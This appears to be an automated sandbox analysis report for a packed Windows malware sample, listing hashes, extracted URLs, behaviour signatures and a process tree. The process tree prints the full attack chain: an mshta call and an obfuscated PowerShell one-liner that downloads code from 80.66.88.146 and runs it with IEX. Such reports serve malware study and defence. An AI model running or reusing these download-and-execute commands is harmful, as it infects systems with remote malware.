Analysis
-
max time kernel
46s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
11-10-2022 12:37
General
-
Target
file.exe
-
Size
91KB
-
MD5
0930b477703d6a03eb120ad3543513d8
-
SHA1
7bc33a9595ffd5f5bacb6843ee1dfcd86df74fa1
-
SHA256
9699022b7bd45a72cf29614bdd131400dbee0ab5d6a5c2e03ed1c13e7cf0eca0
-
SHA512
0d9b4c07fbc13f484269d181f2587c92f7a7b817bca07f9956c16aa01c441d8a60ae13afe554f2f8a497607730d7641b2352f481d3cebb98e633b03ddc27617d
-
SSDEEP
1536:XRzdezMTHOFP5WKcyRm1YGl/KVzFeS6Bqt/pr2sQOIkbrPsNI:WzMDKwKx8Yl1FKqtRFYsrPV
Malware Config
Extracted
http://80.66.88.146/R.html
Extracted
http://80.66.88.146/R.png
Signatures
-
Blocklisted process makes network request 2 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\0x.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://80.66.88.146/R.html3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta http://80.66.88.146/R.html4⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{AWA}(N{AWA}{AWA}e{AWA}w-{AWA}Ob{AWA}{AWA}je{AWA}{AWA}c{AWA}t N{AWA}{AWA}e{AWA}t.W{AWA}e';$c4='b{AWA}{AWA}Cli{AWA}{AWA}en{AWA}{AWA}t{AWA}).Do{AWA}{AWA}wn{AWA}{AWA}l{AWA}o';$c3='a{AWA}dS{AWA}{AWA}t{AWA}ri{AWA}{AWA}n{AWA}g{AWA}(''h{AWA}tt{AWA}p:/{AWA}/80.66.88.146/R.png''){AWA}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{AWA}','');IEX $TC|IEX5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\0x.vbsFilesize
1KB
MD5ae1c49e0588d1d2e09338aef13d408d9
SHA120e9198994d5e610c6289ebceea594619732d1e7
SHA2566d68d66efe4cc8b58b9e9fb1461a8728606d1f27b23f1ecaa165cf8c5a62c4e4
SHA512ecf714df09c4f3030c72346c9fd5914d1bb661d0ad13e8e409721212529ac0f68b7b0ce0e7f39e350e3c9999d07cd612426e2524e5627d5fdc56757c3beb4f8e
-
memory/820-55-0x0000000000000000-mapping.dmp
-
memory/1064-60-0x0000000000000000-mapping.dmp
-
memory/1380-54-0x00000000757A1000-0x00000000757A3000-memory.dmpFilesize
8KB
-
memory/1380-59-0x0000000000400000-0x0000000000434000-memory.dmpFilesize
208KB
-
memory/1484-58-0x0000000000000000-mapping.dmp
-
memory/1952-61-0x0000000000000000-mapping.dmp
-
memory/1952-63-0x0000000074050000-0x00000000745FB000-memory.dmpFilesize
5.7MB
-
memory/1952-64-0x0000000074050000-0x00000000745FB000-memory.dmpFilesize
5.7MB